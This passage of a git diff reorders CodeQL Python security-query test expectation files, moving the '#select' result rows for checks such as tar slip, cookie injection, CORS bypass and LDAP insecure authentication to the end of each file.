ControlFlowNode for StringLiteral | this constant String | +| config.py:18:18:18:52 | ControlFlowNode for Attribute() | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:18:18:18:52 | ControlFlowNode for Attribute() | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.expected b/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.expected index 8ffc7ac31d9b..097e3580fb1d 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.expected 
@@ -1,9 +1,3 @@ -#select -| test.py:11:9:11:19 | ControlFlowNode for blob_client | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:11:9:11:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | -| test.py:21:9:21:19 | ControlFlowNode for blob_client | test.py:15:27:15:71 | ControlFlowNode for Attribute() | test.py:21:9:21:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | -| test.py:31:9:31:19 | ControlFlowNode for blob_client | test.py:25:24:25:66 | ControlFlowNode for Attribute() | test.py:31:9:31:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | -| test.py:43:9:43:19 | ControlFlowNode for blob_client | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:43:9:43:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | -| test.py:75:9:75:10 | ControlFlowNode for bc | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:75:9:75:10 | ControlFlowNode for bc | Unsafe usage of v1 version of Azure Storage client-side encryption | edges | test.py:3:1:3:3 | ControlFlowNode for BSC | test.py:7:19:7:21 | ControlFlowNode for BSC | provenance | | | test.py:3:1:3:3 | ControlFlowNode for BSC | test.py:35:19:35:21 | ControlFlowNode for BSC | provenance | | 
@@ -92,3 +86,9 @@ nodes | test.py:73:10:73:33 | ControlFlowNode for get_unsafe_blob_client() | semmle.label | ControlFlowNode for get_unsafe_blob_client() | | test.py:75:9:75:10 | ControlFlowNode for bc | semmle.label | ControlFlowNode for bc | subpaths +#select +| test.py:11:9:11:19 | ControlFlowNode for blob_client | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:11:9:11:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | +| test.py:21:9:21:19 | ControlFlowNode for blob_client | test.py:15:27:15:71 | ControlFlowNode for Attribute() | test.py:21:9:21:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | +| test.py:31:9:31:19 | ControlFlowNode for blob_client | test.py:25:24:25:66 | ControlFlowNode for Attribute() | test.py:31:9:31:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | +| test.py:43:9:43:19 | ControlFlowNode for blob_client | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:43:9:43:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | +| test.py:75:9:75:10 | ControlFlowNode for bc | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:75:9:75:10 | ControlFlowNode for bc | Unsafe usage of v1 version of Azure Storage client-side encryption | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.expected b/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.expected index da6e1c5aa1fd..29ecd398a0af 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-338/InsecureRandomness.expected 
@@ -1,6 +1,6 @@ -#select -| InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | Cryptographically insecure $@ in a security context. | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | random value | edges nodes | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | subpaths +#select +| InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | Cryptographically insecure $@ in a security context. | InsecureRandomness.py:5:12:5:26 | ControlFlowNode for Attribute() | random value | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.expected b/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.expected index 5816701791cf..32d807c6f6e5 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-346/CorsBypass.expected @@ -1,5 +1,3 @@ -#select -| Cors.py:8:12:8:17 | ControlFlowNode for origin | Cors.py:7:18:7:32 | ControlFlowNode for Attribute | Cors.py:8:12:8:17 | ControlFlowNode for origin | Potentially incorrect string comparison which could lead to a CORS bypass. | edges | Cors.py:7:9:7:14 | ControlFlowNode for origin | Cors.py:8:12:8:17 | ControlFlowNode for origin | provenance | | | Cors.py:7:18:7:32 | ControlFlowNode for Attribute | Cors.py:7:18:7:52 | ControlFlowNode for Attribute() | provenance | Config | 
@@ -11,3 +9,5 @@ nodes | Cors.py:7:18:7:52 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | Cors.py:8:12:8:17 | ControlFlowNode for origin | semmle.label | ControlFlowNode for origin | subpaths +#select +| Cors.py:8:12:8:17 | ControlFlowNode for origin | Cors.py:7:18:7:32 | ControlFlowNode for Attribute | Cors.py:8:12:8:17 | ControlFlowNode for origin | Potentially incorrect string comparison which could lead to a CORS bypass. | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.expected b/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.expected index 69e893a6f42d..1d529f3b3ea0 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-348/ClientSuppliedIpUsedInSecurityCheck.expected 
@@ -1,7 +1,3 @@ -#select -| flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | this user input | -| flask_bad.py:21:12:21:20 | ControlFlowNode for client_ip | flask_bad.py:20:17:20:54 | ControlFlowNode for Attribute() | flask_bad.py:21:12:21:20 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | flask_bad.py:20:17:20:54 | ControlFlowNode for Attribute() | this user input | -| tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | this user input | edges | flask_bad.py:13:5:13:13 | ControlFlowNode for client_ip | flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | provenance | | | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | flask_bad.py:13:5:13:13 | ControlFlowNode for client_ip | provenance | | 
@@ -20,3 +16,7 @@ nodes | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | semmle.label | ControlFlowNode for client_ip | subpaths +#select +| flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | flask_bad.py:14:12:14:20 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | flask_bad.py:13:17:13:54 | ControlFlowNode for Attribute() | this user input | +| flask_bad.py:21:12:21:20 | ControlFlowNode for client_ip | flask_bad.py:20:17:20:54 | ControlFlowNode for Attribute() | flask_bad.py:21:12:21:20 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | flask_bad.py:20:17:20:54 | ControlFlowNode for Attribute() | this user input | +| tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | tornado_bad.py:23:16:23:24 | ControlFlowNode for client_ip | IP address spoofing might include code from $@. | tornado_bad.py:22:25:22:69 | ControlFlowNode for Attribute() | this user input | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.expected b/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.expected index 58f42bec0c84..e217064d1dfc 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-522-global-option/LdapInsecureAuth.expected @@ -1,4 +1,4 @@ -#select edges nodes subpaths +#select diff --git a/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.expected b/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.expected index 63a573e7c088..b07d47c203c5 100644 
--- a/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-522/LdapInsecureAuth.expected @@ -1,10 +1,3 @@ -#select -| ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | This LDAP host is authenticated insecurely. | -| ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | This LDAP host is authenticated insecurely. | -| ldap3_remote.py:102:18:102:21 | ControlFlowNode for host | ldap3_remote.py:101:12:101:49 | ControlFlowNode for BinaryExpr | ldap3_remote.py:102:18:102:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | -| ldap3_remote.py:115:18:115:21 | ControlFlowNode for host | ldap3_remote.py:114:12:114:49 | ControlFlowNode for BinaryExpr | ldap3_remote.py:115:18:115:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | -| ldap3_remote.py:127:18:127:21 | ControlFlowNode for host | ldap3_remote.py:126:12:126:31 | ControlFlowNode for BinaryExpr | ldap3_remote.py:127:18:127:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | -| ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | ldap3_remote.py:2:19:2:25 | ControlFlowNode for ImportMember | ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | edges | ldap3_remote.py:2:19:2:25 | ControlFlowNode for ImportMember | ldap3_remote.py:2:19:2:25 | ControlFlowNode for request | provenance | | | ldap3_remote.py:2:19:2:25 | ControlFlowNode for request | ldap3_remote.py:138:21:138:27 | ControlFlowNode for request | provenance | | 
@@ -34,3 +27,10 @@ nodes | ldap3_remote.py:138:21:138:27 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | | ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | semmle.label | ControlFlowNode for host | subpaths +#select +| ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:45:41:45:60 | ControlFlowNode for BinaryExpr | This LDAP host is authenticated insecurely. | +| ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | ldap2_remote.py:56:41:56:60 | ControlFlowNode for BinaryExpr | This LDAP host is authenticated insecurely. | +| ldap3_remote.py:102:18:102:21 | ControlFlowNode for host | ldap3_remote.py:101:12:101:49 | ControlFlowNode for BinaryExpr | ldap3_remote.py:102:18:102:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | +| ldap3_remote.py:115:18:115:21 | ControlFlowNode for host | ldap3_remote.py:114:12:114:49 | ControlFlowNode for BinaryExpr | ldap3_remote.py:115:18:115:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | +| ldap3_remote.py:127:18:127:21 | ControlFlowNode for host | ldap3_remote.py:126:12:126:31 | ControlFlowNode for BinaryExpr | ldap3_remote.py:127:18:127:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | +| ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | ldap3_remote.py:2:19:2:25 | ControlFlowNode for ImportMember | ldap3_remote.py:139:18:139:21 | ControlFlowNode for host | This LDAP host is authenticated insecurely. | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.expected b/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.expected index 0ef7b8b43b79..430e7558fdc6 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.expected 
+++ b/python/ql/test/experimental/query-tests/Security/CWE-770/UnicodeDoS.expected 
@@ -1,10 +1,3 @@ -#select -| tests.py:16:39:16:47 | ControlFlowNode for file_path | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:16:39:16:47 | ControlFlowNode for file_path | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:16:39:16:47 | ControlFlowNode for file_path | costly Unicode normalization operation | -| tests.py:28:43:28:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:28:43:28:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:28:43:28:43 | ControlFlowNode for r | costly Unicode normalization operation | -| tests.py:40:43:40:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:40:43:40:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:40:43:40:43 | ControlFlowNode for r | costly Unicode normalization operation | -| tests.py:52:43:52:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:52:43:52:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:52:43:52:43 | ControlFlowNode for r | costly Unicode normalization operation | -| tests.py:64:43:64:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:64:43:64:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:64:43:64:43 | ControlFlowNode for r | costly Unicode normalization operation | -| tests.py:76:43:76:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:76:43:76:43 | ControlFlowNode for r | This $@ can reach a $@. 
| tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:76:43:76:43 | ControlFlowNode for r | costly Unicode normalization operation | edges | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:1:35:1:41 | ControlFlowNode for request | provenance | | | tests.py:1:35:1:41 | ControlFlowNode for request | tests.py:12:17:12:23 | ControlFlowNode for request | provenance | | 
@@ -71,3 +64,10 @@ nodes | tests.py:72:9:72:33 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | tests.py:76:43:76:43 | ControlFlowNode for r | semmle.label | ControlFlowNode for r | subpaths +#select +| tests.py:16:39:16:47 | ControlFlowNode for file_path | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:16:39:16:47 | ControlFlowNode for file_path | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:16:39:16:47 | ControlFlowNode for file_path | costly Unicode normalization operation | +| tests.py:28:43:28:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:28:43:28:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:28:43:28:43 | ControlFlowNode for r | costly Unicode normalization operation | +| tests.py:40:43:40:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:40:43:40:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:40:43:40:43 | ControlFlowNode for r | costly Unicode normalization operation | +| tests.py:52:43:52:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:52:43:52:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:52:43:52:43 | ControlFlowNode for r | costly Unicode normalization operation | +| tests.py:64:43:64:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:64:43:64:43 | ControlFlowNode for r | This $@ can reach a $@. 
| tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:64:43:64:43 | ControlFlowNode for r | costly Unicode normalization operation | +| tests.py:76:43:76:43 | ControlFlowNode for r | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | tests.py:76:43:76:43 | ControlFlowNode for r | This $@ can reach a $@. | tests.py:1:35:1:41 | ControlFlowNode for ImportMember | user-provided value | tests.py:76:43:76:43 | ControlFlowNode for r | costly Unicode normalization operation | diff --git a/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.expected b/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.expected index 6e9c8ff47dc8..cf3a06ac7c8f 100644 --- a/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.expected 
@@ -1,7 +1,3 @@ -#select -| django_tests.py:6:21:6:43 | ControlFlowNode for Attribute() | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:6:21:6:43 | ControlFlowNode for Attribute() | Cookie is constructed from a $@. | django_tests.py:4:25:4:31 | ControlFlowNode for request | user-supplied input | -| django_tests.py:7:21:7:44 | ControlFlowNode for Attribute() | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:7:21:7:44 | ControlFlowNode for Attribute() | Cookie is constructed from a $@. | django_tests.py:4:25:4:31 | ControlFlowNode for request | user-supplied input | -| django_tests.py:13:30:13:100 | ControlFlowNode for Fstring | django_tests.py:11:26:11:32 | ControlFlowNode for request | django_tests.py:13:30:13:100 | ControlFlowNode for Fstring | Cookie is constructed from a $@. | django_tests.py:11:26:11:32 | ControlFlowNode for request | user-supplied input | edges | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:6:21:6:31 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:7:21:7:31 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | 
@@ -26,3 +22,7 @@ nodes | django_tests.py:13:59:13:69 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | | django_tests.py:13:59:13:82 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | subpaths +#select +| django_tests.py:6:21:6:43 | ControlFlowNode for Attribute() | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:6:21:6:43 | ControlFlowNode for Attribute() | Cookie is constructed from a $@. | django_tests.py:4:25:4:31 | ControlFlowNode for request | user-supplied input | +| django_tests.py:7:21:7:44 | ControlFlowNode for Attribute() | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:7:21:7:44 | ControlFlowNode for Attribute() | Cookie is constructed from a $@. | django_tests.py:4:25:4:31 | ControlFlowNode for request | user-supplied input | +| django_tests.py:13:30:13:100 | ControlFlowNode for Fstring | django_tests.py:11:26:11:32 | ControlFlowNode for request | django_tests.py:13:30:13:100 | ControlFlowNode for Fstring | Cookie is constructed from a $@. | django_tests.py:11:26:11:32 | ControlFlowNode for request | user-supplied input | diff --git a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.expected b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.expected index 69039d12c4d1..7f83ceae8fe0 100644 --- a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.expected +++ b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.expected 
@@ -1,10 +1,3 @@ -#select -| test.py:15:36:15:39 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:15:36:15:39 | ControlFlowNode for data | Call to hmac.new [position 1] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:25:44:25:47 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:25:44:25:47 | ControlFlowNode for data | Call to hmac.new [keyword msg] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:35:10:35:13 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:35:10:35:13 | ControlFlowNode for data | Call to unknown.lib.func [position 0] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:36:13:36:16 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:36:13:36:16 | ControlFlowNode for data | Call to unknown.lib.func [keyword kw] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:43:22:43:25 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:43:22:43:25 | ControlFlowNode for data | Call to unknown.lib.func [position 0] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:44:25:44:28 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:44:25:44:28 | ControlFlowNode for data | Call to unknown.lib.func [keyword kw] with untrusted data from $@. 
| test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | edges | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:5:26:5:32 | ControlFlowNode for request | provenance | | | test.py:5:26:5:32 | ControlFlowNode for request | test.py:13:16:13:22 | ControlFlowNode for request | provenance | | 
@@ -75,3 +68,10 @@ nodes | test.py:54:12:54:35 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | test.py:55:17:55:20 | ControlFlowNode for data | semmle.label | ControlFlowNode for data | subpaths +#select +| test.py:15:36:15:39 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:15:36:15:39 | ControlFlowNode for data | Call to hmac.new [position 1] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:25:44:25:47 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:25:44:25:47 | ControlFlowNode for data | Call to hmac.new [keyword msg] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:35:10:35:13 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:35:10:35:13 | ControlFlowNode for data | Call to unknown.lib.func [position 0] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:36:13:36:16 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:36:13:36:16 | ControlFlowNode for data | Call to unknown.lib.func [keyword kw] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:43:22:43:25 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:43:22:43:25 | ControlFlowNode for data | Call to unknown.lib.func [position 0] with untrusted data from $@. 
| test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:44:25:44:28 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:44:25:44:28 | ControlFlowNode for data | Call to unknown.lib.func [keyword kw] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | diff --git a/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.expected b/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.expected index abdccddd631b..6f98ea1aae2b 100644 --- a/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.expected +++ b/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.expected 
@@ -1,13 +1,3 @@ -#select -| tarslip.py:15:1:15:3 | ControlFlowNode for tar | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | tarslip.py:15:1:15:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:20:17:20:21 | ControlFlowNode for entry | tarslip.py:18:7:18:39 | ControlFlowNode for Attribute() | tarslip.py:20:17:20:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:18:7:18:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:39:17:39:21 | ControlFlowNode for entry | tarslip.py:35:7:35:39 | ControlFlowNode for Attribute() | tarslip.py:39:17:39:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:35:7:35:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:43:24:43:26 | ControlFlowNode for tar | tarslip.py:42:7:42:39 | ControlFlowNode for Attribute() | tarslip.py:43:24:43:26 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:42:7:42:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:61:21:61:25 | ControlFlowNode for entry | tarslip.py:58:7:58:39 | ControlFlowNode for Attribute() | tarslip.py:61:21:61:25 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:58:7:58:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:91:1:91:3 | ControlFlowNode for tar | tarslip.py:90:7:90:39 | ControlFlowNode for Attribute() | tarslip.py:91:1:91:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:90:7:90:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:96:17:96:21 | ControlFlowNode for entry | tarslip.py:94:7:94:39 | ControlFlowNode for Attribute() | tarslip.py:96:17:96:21 | ControlFlowNode for entry | This file extraction depends on a $@. 
| tarslip.py:94:7:94:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:110:1:110:3 | ControlFlowNode for tar | tarslip.py:109:7:109:39 | ControlFlowNode for Attribute() | tarslip.py:110:1:110:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:109:7:109:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:113:24:113:26 | ControlFlowNode for tar | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | tarslip.py:113:24:113:26 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | potentially untrusted source | edges | tarslip.py:14:1:14:3 | ControlFlowNode for tar | tarslip.py:15:1:15:3 | ControlFlowNode for tar | provenance | | | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | tarslip.py:14:1:14:3 | ControlFlowNode for tar | provenance | | 
@@ -64,3 +54,13 @@ nodes | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | tarslip.py:113:24:113:26 | ControlFlowNode for tar | semmle.label | ControlFlowNode for tar | subpaths +#select +| tarslip.py:15:1:15:3 | ControlFlowNode for tar | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | tarslip.py:15:1:15:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:20:17:20:21 | ControlFlowNode for entry | tarslip.py:18:7:18:39 | ControlFlowNode for Attribute() | tarslip.py:20:17:20:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:18:7:18:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:39:17:39:21 | ControlFlowNode for entry | tarslip.py:35:7:35:39 | ControlFlowNode for Attribute() | tarslip.py:39:17:39:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:35:7:35:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:43:24:43:26 | ControlFlowNode for tar | tarslip.py:42:7:42:39 | ControlFlowNode for Attribute() | tarslip.py:43:24:43:26 | ControlFlowNode for tar | This file extraction depends on a $@. | 